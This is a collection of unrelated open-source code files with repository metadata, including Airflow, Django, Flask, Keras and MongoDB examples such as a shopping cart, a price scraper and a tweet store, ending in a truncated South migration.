refs/heads/main
| 2023-02-07T21:46:35.257103
| 2020-12-31T10:12:01
| 2020-12-31T10:12:01
| 325,768,155
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
def log_sla_miss(dag, task_list, blocking_task_list, slas, blocking_tis):
    print(
        f"SLA missed on DAG {dag.dag_id}: slas={slas}, affected task list: {task_list}; "
        f"blocking task instances: {blocking_tis}, blocking task list: {blocking_task_list}"
    )
default_args = {
"owner": "airflow",
"start_date": datetime(2020, 1, 1, 23, 15, 0),
"depend_on_past": False,
"email": None,
"email_on_failure": False,
"email_on_retry": False,
"retries": 0
}
with DAG(dag_id="sla_dag",
schedule_interval="*/1 * * * *",
default_args=default_args,
sla_miss_callback=log_sla_miss,
catchup=False) as dag:
t0 = DummyOperator(task_id="t0")
t1 = BashOperator(task_id="t1",
bash_command="sleep 15",
sla=timedelta(seconds=5),
retries=0)
t0 >> t1
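# Note: t1 sleeps for 15 seconds against a 5-second SLA, so every scheduled
# run of this DAG is expected to trigger the log_sla_miss callback above.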
|
[
"harish678@outlook.com"
] |
harish678@outlook.com
|
9d8168f1cdedf3b05457fefb7d05eff66a698418
|
687db4c321d9e06fe780a2ee444f1e10648e1fc7
|
/manage.py
|
9c443460c05034eb3af4ea470ccc5845b3e6ae4d
|
[] |
no_license
|
nanoy42/yogo
|
e31c1e0f3a61bd9e874b21dd9b55c0e7e19858d9
|
d95d07ce65c7bc0491bdb41b9a4e90bf0ed33800
|
refs/heads/master
| 2021-12-14T22:15:49.430593
| 2018-06-16T16:42:37
| 2018-06-16T16:42:37
| 189,669,485
| 1
| 0
| null | 2021-11-29T18:00:11
| 2019-05-31T23:27:04
|
Python
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "yogo.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"me@nanoy.fr"
] |
me@nanoy.fr
|
c99227d1c8c33454bf0965a95d3156375bc33b64
|
a16bd2d3cd8c103be2c24c801fce92dc453823a1
|
/Tutorials/Libraries-Tools-Frameworks/BlockchainDev/SmartContractLottery/src/scripts/__init__.py
|
bf5cb77189d7e306d48e829f330c2c6fbc57f0ec
|
[] |
no_license
|
jerryq27/Cheatsheets
|
d7fb7c17d55e3b51ca349155fbaf13f9f6fda2db
|
f9afa5ffb7c031cf4b7932678f4686a38c542f27
|
refs/heads/master
| 2023-03-11T22:45:46.497858
| 2022-11-21T03:16:12
| 2022-11-21T03:16:12
| 168,776,030
| 6
| 0
| null | 2023-03-07T12:16:31
| 2019-02-02T00:07:10
|
Solidity
|
UTF-8
|
Python
| false
| false
| 55
|
py
|
# So Python recognizes the parent folder as a package.
|
[
"jerryq27@gmail.com"
] |
jerryq27@gmail.com
|
64576893967d9f80106f384a1dc7489d7cf1e906
|
802bffe032431a25c3239383e125f94a7b3b8c98
|
/carro/carro.py
|
36d286cfc29f24a96377b95de6bbee73a0d20258
|
[] |
no_license
|
JGiron21/Electronica-TICS
|
449d2162134cfda1bad041541fc804429bf287cd
|
c3ad86b626f03742baa30c2d5697d5b2a396d587
|
refs/heads/main
| 2023-09-03T15:06:17.669758
| 2021-11-11T03:01:13
| 2021-11-11T03:01:13
| 426,851,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
class Carro:
def __init__(self, request):
self.request=request
self.session=request.session
carro=self.session.get("carro")
if not carro:
carro=self.session["carro"]={}
self.carro=carro
def agregar(self, producto):
if(str(producto.id) not in self.carro.keys()):
            self.carro[str(producto.id)]={  # string key, so lookups stay consistent after session serialization
"producto_id": producto.id,
"nombre": producto.nombre,
"precio": str(producto.precio),
"cantidad":1,
"imagen": producto.imagen.url
}
else:
for key, value in self.carro.items():
if key==str(producto.id):
value["cantidad"]=value["cantidad"]+1
break
self.guardar_carro()
def guardar_carro(self):
self.session["carro"]=self.carro
self.session.modified=True
def eliminar(self, producto):
producto.id=str(producto.id)
if producto.id in self.carro:
del self.carro[producto.id]
self.guardar_carro()
def restar_producto(self, producto):
for key, value in self.carro.items():
if key==str(producto.id):
value["cantidad"]=value["cantidad"]-1
if value["cantidad"]<1:
self.eliminar(producto)
break
self.guardar_carro()
    def limpiar_carro(self):
        self.carro = self.session["carro"] = {}  # reset both the instance copy and the session copy
        self.session.modified=True
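# Illustrative session layout after agregar() (hypothetical values):
# request.session["carro"] == {"3": {"producto_id": 3, "nombre": "Camisa",
#     "precio": "9.99", "cantidad": 2, "imagen": "/media/camisa.jpg"}}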
|
[
"noreply@github.com"
] |
JGiron21.noreply@github.com
|
06aba7e4a25889799cbd8d45b1a950d67744908b
|
170817af6e590bbf185c1a4ed4d4057f5362d5ca
|
/projects/travello/views.py
|
f62c75a038122b837c16043d6a1725af3bd57c39
|
[] |
no_license
|
MoisesEnrique/travello
|
a07b39096892c911820898dacd733945bfb00391
|
0b6887ea799b27cda193c8338b4c08ce40fc5fa4
|
refs/heads/master
| 2023-06-07T09:41:44.151800
| 2021-06-28T16:11:58
| 2021-06-28T16:11:58
| 377,649,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
from django.shortcuts import render
# import the Destination class from models
from .models import Destination
# Create your views here.
# Define the index view to match the URL pattern declared in travello/urls.py.
def index(request): # receives the client's request
    dests = Destination.objects.all() # fetch all objects from the Destination table
    return render(request, 'index.html', {'dests': dests}) # pass the list of destinations to index.html
|
[
"moises.mac@gmail.com"
] |
moises.mac@gmail.com
|
a7587434ee4645c63e4ed7e6554dea102c9d18c0
|
309318310a47631162b4d057db6430f77d0be388
|
/server/system/MongoDBManager.py
|
d9a1247a1453c73e92b40fddeb0d2d7e74ae8dc5
|
[] |
no_license
|
17chuchu/Media-Analytics-Network-based
|
d76def61c43a722d3c17f6a62e33254205c5241c
|
00005aaa5ddd9ffed641918ac340e68b48c8bdf9
|
refs/heads/master
| 2022-04-18T19:38:09.618458
| 2020-03-23T09:23:57
| 2020-03-23T09:23:57
| 245,896,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,457
|
py
|
import pymongo
class MongoDBManager:
client = None
db = None
collection = None
mention = None
timeline = None
user = None
entities = None
replystatus = None
gottentimelineuser = None
@staticmethod
def setup():
MongoDBManager.client = pymongo.MongoClient("mongodb://localhost:27017/")
MongoDBManager.db = MongoDBManager.client["socialmediadatabase"]
MongoDBManager.collection = MongoDBManager.db["socialmediacollection"]
MongoDBManager.mention = MongoDBManager.db["socialmediamention"]
MongoDBManager.timeline = MongoDBManager.db["socialmediatimeline"]
MongoDBManager.user = MongoDBManager.db["socialmediauser"]
MongoDBManager.entities = MongoDBManager.db["socialmediaentities"]
MongoDBManager.replystatus = MongoDBManager.db["socialmediareplystatus"]
MongoDBManager.gottentimelineuser = MongoDBManager.db["gottentimelineuser"]
@staticmethod
def insertCollection(tweeter_post):
if(MongoDBManager.collection.find_one({ "id": tweeter_post["id"] })):
return
else:
data_id = MongoDBManager.collection.insert_one(tweeter_post).inserted_id
data_id = str(data_id)
tweeter_post["user"]["_id"] = data_id
tweeter_post["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": tweeter_post["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": tweeter_post["user"]["id"] })
MongoDBManager.user.insert_one(tweeter_post["user"])
else:
MongoDBManager.user.insert_one(tweeter_post["user"])
MongoDBManager.entities.insert_one(tweeter_post["entities"])
print("streaming \t",data_id)
@staticmethod
def insertMention(mention):
if(MongoDBManager.mention.find_one({ "id": mention["id"] })):
return
else:
data_id = MongoDBManager.mention.insert_one(mention).inserted_id
data_id = str(data_id)
mention["user"]["_id"] = data_id
mention["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": mention["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": mention["user"]["id"] })
MongoDBManager.user.insert_one(mention["user"])
else:
MongoDBManager.user.insert_one(mention["user"])
MongoDBManager.entities.insert_one(mention["entities"])
print("mention_timeline\t",data_id)
@staticmethod
def insertTimeline(timeline):
if(MongoDBManager.timeline.find_one({ "id": timeline["id"] })):
return
else:
data_id = MongoDBManager.timeline.insert_one(timeline).inserted_id
data_id = str(data_id)
timeline["user"]["_id"] = data_id
timeline["entities"]["_id"] = data_id
if(MongoDBManager.user.find_one({ "id": timeline["user"]["id"] })):
MongoDBManager.user.delete_one({ "id": timeline["user"]["id"] })
MongoDBManager.user.insert_one(timeline["user"])
else:
MongoDBManager.user.insert_one(timeline["user"])
MongoDBManager.entities.insert_one(timeline["entities"])
print("user_timeline\t",data_id)
@staticmethod
def insertReplyStatus(reply):
if(MongoDBManager.replystatus.find_one({ "id": reply["id"] })):
return
else:
data_id = MongoDBManager.replystatus.insert_one(reply).inserted_id
print("reply_status\t",data_id)
@staticmethod
def getMostActiveUser(ban_name_list):
result = {}
for user in MongoDBManager.collection.find():
if user["user"]["screen_name"] not in ban_name_list:
if(user["user"]["id"] in result):
result[user["user"]["id"]] += 1
else:
result[user["user"]["id"]] = 1
user_frequency = 0
top_user = ""
for user_id in result.keys():
if(result[user_id] >= user_frequency):
user_frequency = result[user_id]
top_user = user_id
return top_user
@staticmethod
def getMostActiveUsersIDByLimit(limit, ban_list):
result = {}
result_by_limit = []
for user in MongoDBManager.collection.find():
if(user["user"]["id"] not in ban_list):
if(user["user"]["id"] in result):
result[user["user"]["id"]] += 1
else:
result[user["user"]["id"]] = 1
#Credit : https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
result = sorted(result.items(), key=lambda item: item[1],reverse=True)
#
for user in result:
result_by_limit.append(user[0])
if(len(result_by_limit) >= limit):
break
return result_by_limit
@staticmethod
def getMostMentionedAboutUsersIDByLimit(limit,ban_list):
result = {}
result_by_limit = []
for entities in MongoDBManager.entities.find():
for user in entities["user_mentions"]:
if(user["id"] not in ban_list):
if(user["id"] in result):
result[user["id"]] += 1
else:
result[user["id"]] = 1
#Credit : https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
result = sorted(result.items(), key=lambda item: item[1],reverse=True)
#
for user in result:
result_by_limit.append(user[0])
if(len(result_by_limit) >= limit):
break
return result_by_limit
@staticmethod
def insertTimelineUser(userid):
MongoDBManager.gottentimelineuser.insert_one({"userid" :userid})
@staticmethod
def getTimelineUserNumbers(filter):
return MongoDBManager.gottentimelineuser.count_documents(filter)
@staticmethod
def removeAllTimelineUser():
MongoDBManager.gottentimelineuser.delete_many({})
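# Hypothetical usage sketch (not part of the original module): the class acts
# as a static singleton, so setup() must run once before any other call.
# MongoDBManager.setup()
# MongoDBManager.insertCollection(tweet_json)
# top_users = MongoDBManager.getMostActiveUsersIDByLimit(10, ban_list=[])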
|
[
"17chuchu.guy@gmail.com"
] |
17chuchu.guy@gmail.com
|
e4264085a89617c4a9f1e8fa44198720face8196
|
e47264a2f227d50b20c86508d145d6c138e9b4fc
|
/app/config.py
|
1a666d0008fa97d8ddd20b0345842806ae36ebfc
|
[
"MIT"
] |
permissive
|
giantoak/tempus
|
5856e86cb5a19fb3b406fb679ef94bd9ae8b8fd1
|
f99092e350344b7dee21eeefde659a04b74e7fc6
|
refs/heads/master
| 2021-04-09T16:59:40.751826
| 2015-04-10T19:03:17
| 2015-04-10T19:03:17
| 33,481,052
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
import os
dburl = os.getenv('TEMPUS_DB_URL', '')
port = os.getenv('TEMPUS_PORT', 5000)
redisurl = os.getenv('TEMPUS_REDIS_URL', 'localhost')
# Environment variables set by Docker Compose
_opencpu_host = os.getenv('OPENCPU_1_PORT_80_TCP_ADDR', 'localhost')
_opencpu_port = os.getenv('OPENCPU_1_PORT_80_TCP_PORT', '80')
OPENCPUURL = 'http://' + _opencpu_host + ':' + _opencpu_port
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
UPLOAD_DIR = os.path.join(APP_ROOT, 'upload')
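# With no environment overrides, OPENCPUURL resolves to 'http://localhost:80'
# and UPLOAD_DIR to '<directory of this file>/upload'.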
|
[
"sam.zhang@giantoak.com"
] |
sam.zhang@giantoak.com
|
e3340e2bb2c4013256a6653332f3108d9cb7307c
|
126a699598079c3a9c0a22b7fe663243239f8dcc
|
/workflows/pbt/models/tc1/tc1_runner.py
|
3a0b24b05963389df09089502cbf3197d0a62bf6
|
[
"MIT"
] |
permissive
|
andrew-weisman/Supervisor
|
d255e8edb7541c716f270a264cca123111beba81
|
9110f85c85dcc2593de68db96dbd0f433a476507
|
refs/heads/master
| 2023-01-24T21:11:41.058642
| 2020-05-08T16:10:26
| 2020-05-08T16:10:26
| 312,182,445
| 0
| 0
|
MIT
| 2020-11-24T03:33:56
| 2020-11-12T06:01:40
| null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
# tensorflow.__init__ calls _os.path.basename(_sys.argv[0])
# so we need to create a synthetic argv.
import sys
if not hasattr(sys, 'argv'):
sys.argv = ['nt3_tc1']
import json
import os
import numpy as np
import importlib
import runner_utils
import log_tools
logger = None
def import_pkg(framework, model_name):
if framework == 'keras':
module_name = "{}_baseline_keras2".format(model_name)
pkg = importlib.import_module(module_name)
from keras import backend as K
if K.backend() == 'tensorflow' and 'NUM_INTER_THREADS' in os.environ:
import tensorflow as tf
print("Configuring tensorflow with {} inter threads and {} intra threads".
format(os.environ['NUM_INTER_THREADS'], os.environ['NUM_INTRA_THREADS']))
session_conf = tf.ConfigProto(inter_op_parallelism_threads=int(os.environ['NUM_INTER_THREADS']),
intra_op_parallelism_threads=int(os.environ['NUM_INTRA_THREADS']))
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
# elif framework is 'mxnet':
# import nt3_baseline_mxnet
# pkg = nt3_baseline_keras_baseline_mxnet
# elif framework is 'neon':
# import nt3_baseline_neon
# pkg = nt3_baseline_neon
else:
raise ValueError("Invalid framework: {}".format(framework))
return pkg
def run(hyper_parameter_map, callbacks=None):
global logger
logger = log_tools.get_logger(logger, __name__)
framework = hyper_parameter_map['framework']
model_name = hyper_parameter_map['model_name']
pkg = import_pkg(framework, model_name)
runner_utils.format_params(hyper_parameter_map)
# params is python dictionary
params = pkg.initialize_parameters()
for k,v in hyper_parameter_map.items():
#if not k in params:
# raise Exception("Parameter '{}' not found in set of valid arguments".format(k))
params[k] = v
runner_utils.write_params(params, hyper_parameter_map)
history = pkg.run(params, callbacks)
runner_utils.keras_clear_session(framework)
# use the last validation_loss as the value to minimize
val_loss = history.history['val_loss']
result = val_loss[-1]
print("result: ", result)
return result
if __name__ == '__main__':
logger = log_tools.get_logger(logger, __name__)
logger.debug("RUN START")
param_string = sys.argv[1]
instance_directory = sys.argv[2]
model_name = sys.argv[3]
framework = sys.argv[4]
exp_id = sys.argv[5]
run_id = sys.argv[6]
benchmark_timeout = int(sys.argv[7])
hyper_parameter_map = runner_utils.init(param_string, instance_directory, framework, 'save')
hyper_parameter_map['model_name'] = model_name
hyper_parameter_map['experiment_id'] = exp_id
hyper_parameter_map['run_id'] = run_id
hyper_parameter_map['timeout'] = benchmark_timeout
# clear sys.argv so that argparse doesn't object
sys.argv = ['nt3_tc1_runner']
result = run(hyper_parameter_map)
runner_utils.write_output(result, instance_directory)
logger.debug("RUN STOP")
|
[
"ncollier@anl.gov"
] |
ncollier@anl.gov
|
d42c24042185989b69058865b037dd56543b4764
|
18a853effa699c8c6b2a83e0e1b47715c591fe2a
|
/Code/prod/restful_server.py
|
647fd701f6b6086cf8d3b54899755054d731962d
|
[] |
no_license
|
XrosLiang/intkb
|
b9ef5126ca8272d3be98f4208c65b85036a11154
|
8b627314b109e8b6f8caff9c6d2142e17238511b
|
refs/heads/main
| 2023-01-05T10:34:38.531123
| 2020-11-04T09:19:23
| 2020-11-04T09:19:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,719
|
py
|
import json
import time
from datetime import datetime
from flask import Flask, request, jsonify
from kbcompleter import KBCompleter
from apis import enhanced_linker
app = Flask(__name__)
kbcompleter = KBCompleter()
@app.route('/test', methods=['GET'])
def test():
return jsonify({
"message": "Success",
"time": datetime.now()
})
@app.route('/id2ans', methods=['GET'])
def get_fact():
qid = request.args.get('subject_id')
pid = request.args.get('property_id')
start_1 = time.perf_counter()
query = kbcompleter.construct_query(qid, pid)
end_1 = time.perf_counter()
start_2 = time.perf_counter()
predictions = kbcompleter.prod_predict(query)
end_2 = time.perf_counter()
top_prediction = sorted(predictions, key=lambda x:x['span_score'], reverse=True)[0]
start_3 = time.perf_counter()
objects = [] if not top_prediction['text'] else enhanced_linker(texts=[top_prediction['text']], dataset=query['property'])
end_3 = time.perf_counter()
top_prediction['object'] = objects
result = {"query": query, "prediction": top_prediction, 'time': {
'construct_query': end_1 - start_1,
'prediction': end_2 - start_2,
'linking': end_3 - start_3
}}
return jsonify(result)
@app.route('/context2ans', methods=['POST'])
def get_answer_from_context():
if request.method == 'POST':
from_post = request.get_data()
json_post = json.loads(from_post)
context, question = json_post['context'], json_post['question']
return jsonify(kbcompleter.predict(question, context))
else:
return 'POST REQUEST ONLY !'
if __name__ == '__main__':
app.run(debug=True)
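# Illustrative request (the IDs are hypothetical Wikidata-style values):
# GET /id2ans?subject_id=Q42&property_id=P69
# -> JSON with the constructed query, the top prediction, and per-stage timings.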
|
[
"bernhard2202@gmail.com"
] |
bernhard2202@gmail.com
|
3dae3b132e8398faebe644036eb7ac6200d2c1d4
|
38c22752a95b94f66d9e7f35709ad417378cd3df
|
/home/views.py
|
ea400efa6cb486204ede4482e3a2964220d51ef6
|
[] |
no_license
|
mr-engin3er/congator
|
f71e4cd6469ef3d982a070a3dd209c15fa28931c
|
36697f3085d34d4617c6496d3c86c72eb3f2ab5d
|
refs/heads/master
| 2023-02-10T18:15:37.691607
| 2021-01-05T16:39:39
| 2021-01-05T16:39:39
| 327,058,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,408
|
py
|
import requests
from bs4 import BeautifulSoup
from django.shortcuts import render
from .models import Search
# Create your views here.
AMAZONE_URL = 'https://www.amazon.in/s?k={}'
FLIPKART_URL = 'https://www.flipkart.com/search?q={}'
def index(request):
return render(request, 'home/index.html')
def new_search(request):
search = request.POST.get('search')
# Search.objects.create(search=search)
def amazon(search):
FINAL_AMAZON_URL = AMAZONE_URL.format(
requests.compat.quote_plus(search))
response = requests.get(FINAL_AMAZON_URL)
soup = BeautifulSoup(response.text, features="html.parser")
search_title = soup.find_all(
'span', {'class': 'a-size-medium a-color-base a-text-normal'})
search_price = soup.find_all(
'span', {'class': 'a-price-whole'})
search_link = soup.find_all(
'a', {'class': 'a-link-normal a-text-normal'})
search_photo = soup.find_all('img', {'class': 's-image'})
amazon_title = search_title[0].text
amazon_price = search_price[0].text
amazon_url = f"https://www.amazon.in{search_link[0].get('href')}"
amazon_photo = search_photo[0].get('src')
return {'amazon_title': amazon_title,
'amazon_price': amazon_price,
'amazon_url': amazon_url,
'amazon_photo': amazon_photo}
def flipkart(search):
FINAL_FLIPKART_URL = FLIPKART_URL.format(
requests.compat.quote_plus(search))
response = requests.get(FINAL_FLIPKART_URL)
soup = BeautifulSoup(response.text, features="html.parser")
search_title = soup.find_all(
'div', {'class': '_4rR01T'})
search_price = soup.find_all(
'div', {'class': '_30jeq3 _1_WHN1'})
search_link = soup.find_all(
'a', {'class': '_1fQZEK'})
flipkart_title = search_title[0].text
flipkart_price = search_price[0].text
flipkart_url = f"https://www.flipkart.com{search_link[0].get('href')}"
return {'flipkart_title': flipkart_title,
'flipkart_price': flipkart_price,
'flipkart_url': flipkart_url}
context = {
'search': search,
}
context.update(amazon(search))
context.update(flipkart(search))
print(context)
return render(request, 'home/new_search.html', context)
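# Note (suggestion, not in the original): both scrapers index the first search
# result directly with [0], so an empty result page raises IndexError; a guard
# such as `if search_title:` would make this more robust.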
|
[
"dheerajsanadhya@gmail.com"
] |
dheerajsanadhya@gmail.com
|
f23254a003f62103d9cf0c1daf2d17a5a8661d7c
|
9d25e3339c6d964769f02ffe2dcfcbd98d6588b8
|
/hul_test - Copy.py
|
72ffa9465270a247ddfe6180d1762f9cf445e10e
|
[] |
no_license
|
LimKaiZhuo/strainsensor
|
c4e4ae786b51aa0b674860b41eef04acac79b7c8
|
8307e69758c71c46e2496e2f87a844061c8e77e3
|
refs/heads/master
| 2023-01-14T16:27:16.459520
| 2020-11-17T09:49:00
| 2020-11-17T09:49:00
| 203,913,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,819
|
py
|
from keras.layers import Input, Dense, Lambda, Layer
from keras.initializers import Constant
from keras.models import Model
from keras import backend as K
import numpy as np
from own_package.features_labels_setup import load_data_to_fl
from own_package.models.models import create_hparams
# Custom loss layer
class CustomMultiLossLayer(Layer):
def __init__(self, nb_outputs=2, init_std=None, **kwargs):
self.nb_outputs = nb_outputs
self.is_placeholder = True
self.init_std = init_std
super(CustomMultiLossLayer, self).__init__(**kwargs)
def build(self, input_shape=None):
# initialise log_vars
self.log_vars = []
if self.init_std:
self.init_std = [np.log(std) for std in self.init_std]
else:
self.init_std = [0 for _ in range(self.nb_outputs)]
for i in range(self.nb_outputs):
self.log_vars += [self.add_weight(name='log_var' + str(i), shape=(1,),
initializer=Constant(self.init_std[i]), trainable=True)]
super(CustomMultiLossLayer, self).build(input_shape)
def multi_loss(self, ys_true, ys_pred):
assert len(ys_true) == self.nb_outputs and len(ys_pred) == self.nb_outputs
loss = 0
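        # Each output contributes exp(-log_var) * (y - y_pred)^2 + log_var,
        # i.e. the homoscedastic task-uncertainty weighting of Kendall & Gal.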
for y_true, y_pred, log_var in zip(ys_true, ys_pred, self.log_vars):
precision = K.exp(-log_var[0])
loss += K.sum(precision * (y_true - y_pred) ** 2. + log_var[0], -1)
return K.mean(loss)
def call(self, inputs):
ys_true = inputs[:self.nb_outputs]
ys_pred = inputs[self.nb_outputs:]
loss = self.multi_loss(ys_true, ys_pred)
self.add_loss(loss, inputs=inputs)
# We won't actually use the output.
return K.concatenate(inputs, -1)
sigma1 = 1e1 # ground truth
sigma2 = 1e-2 # ground truth
def gen_data(N):
X = np.random.randn(N, Q)
w1 = 2.
b1 = 8.
Y1 = X.dot(w1) + b1 + sigma1 * np.random.randn(N, D1)
w2 = 0.01
b2 = 0.03
Y2 = X.dot(w2) + b2 + sigma2 * np.random.randn(N, D2)
return X, Y1, Y2
N = 50
nb_epoch = 2000
batch_size = 20
nb_features = 10
Q = 1
D1 = 1 # first output
D2 = 1 # second output
def get_prediction_model():
inp = Input(shape=(Q,), name='inp')
x = Dense(nb_features, activation='relu')(inp)
y1_pred = Dense(10, activation='relu')(x)
y1_pred = Dense(1, activation='linear')(y1_pred)
y2_pred = Dense(10, activation='relu')(x)
y2_pred = Dense(1, activation='linear')(y2_pred)
return Model(inp, [y1_pred, y2_pred])
def get_trainable_model(prediction_model):
inp = Input(shape=(Q,), name='inp')
y1_pred, y2_pred = prediction_model(inp)
y1_true = Input(shape=(D1,), name='y1_true')
y2_true = Input(shape=(D2,), name='y2_true')
out = CustomMultiLossLayer(nb_outputs=2, init_std=None)([y1_true, y2_true, y1_pred, y2_pred])
return Model([inp, y1_true, y2_true], out)
prediction_model = get_prediction_model()
prediction_model.summary()
trainable_model = get_trainable_model(prediction_model)
trainable_model.compile(optimizer='adam', loss=None)
assert len(trainable_model.layers[-1].trainable_weights) == 2 # two log_vars, one for each output
assert len(trainable_model.losses) == 1
hparams = create_hparams(shared_layers=[30], ts_layers=[10,10,10], cs_layers=[10,10], epochs=1000,reg_l1=0.001, reg_l2=0.1,
activation='relu',batch_size=100, verbose=0)
fl = load_data_to_fl('./excel/Data_loader_test.xlsx', norm_mask=[0])
X = fl.features_c_norm
Y1 = np.copy(fl.labels[:,0])
Y2 = np.copy(fl.labels[:,1])
trainable_model.summary()
hist = trainable_model.fit([X, Y1, Y2], nb_epoch=nb_epoch, batch_size=batch_size, verbose=1)
print([np.exp(K.get_value(log_var[0]))**0.5 for log_var in trainable_model.layers[-1].log_vars])
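# The printed values are sqrt(exp(log_var)) for each output, i.e. the learned
# per-task noise standard deviations.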
|
[
"limkaizhuo@gmail.com"
] |
limkaizhuo@gmail.com
|
7832b91058e738847544b4d63bc17514548576df
|
52cc87565521204ad8268bc5cd3bdf8c2e7570a9
|
/4.2. Course_Gen/venv/Scripts/easy_install-3.7-script.py
|
a1b39f1d3cc2e9b08bd73095beaec04de787347f
|
[] |
no_license
|
WadeShadow/I_S_labs
|
07c2837031c84315409bb2c2bf546c84021799d0
|
69b9c0795cd9d3ec268d8ce697b3be198d450606
|
refs/heads/master
| 2022-10-05T20:38:01.227677
| 2020-05-26T21:15:30
| 2020-05-26T21:15:30
| 258,615,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
#!C:\Users\dsokolovrudakov\Downloads\4\gen_alg\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"worldkeeper17@gmail.com"
] |
worldkeeper17@gmail.com
|
02e7d6dd2c05cd4ab78ac45fd92c316ad971c20e
|
8b1be1876f71e71f6adc7819cea94d4b7faf4a17
|
/src/demo_poc.py
|
6e326142642176dca18735ccca82345026d4243b
|
[] |
no_license
|
MihaCim/CogloTools
|
f68528d31045c5bf020ebea143d0da9670478f82
|
43837c69a5858d6400e8d6c39dc9edb9b6ec00cf
|
refs/heads/master
| 2021-06-06T19:10:56.954538
| 2021-05-25T11:24:29
| 2021-05-25T11:24:29
| 169,245,444
| 0
| 0
| null | 2021-01-30T00:24:46
| 2019-02-05T13:27:24
|
Python
|
UTF-8
|
Python
| false
| false
| 99
|
py
|
from modules.demo.api_poc import CognitiveAdvisorAPI
server = CognitiveAdvisorAPI()
server.start()
|
[
"ensidio94@gmail.com"
] |
ensidio94@gmail.com
|
a29625c84a55b65eac5e4f9564bd2a6e23ba8bcb
|
cc493f7e3b2fcac999d9d632b394bf1e53a26026
|
/eventPlanner/migrations/0008_auto__add_attendee.py
|
ae9891070e17eff295442fad3311c6e45ad1127d
|
[] |
no_license
|
SteveKhuu/eventPlanner
|
3337c9a1e065f0e405c6f41b029b71df027db1aa
|
fb260dbdde848eaed9c0b97314162d4d39f530d3
|
refs/heads/master
| 2020-03-26T17:51:15.044870
| 2012-12-01T14:47:07
| 2012-12-01T14:47:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,389
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Attendee'
db.create_table('eventPlanner_attendee', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('event', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['eventPlanner.Events'])),
('is_managing', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('eventPlanner', ['Attendee'])
def backwards(self, orm):
# Deleting model 'Attendee'
db.delete_table('eventPlanner_attendee')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
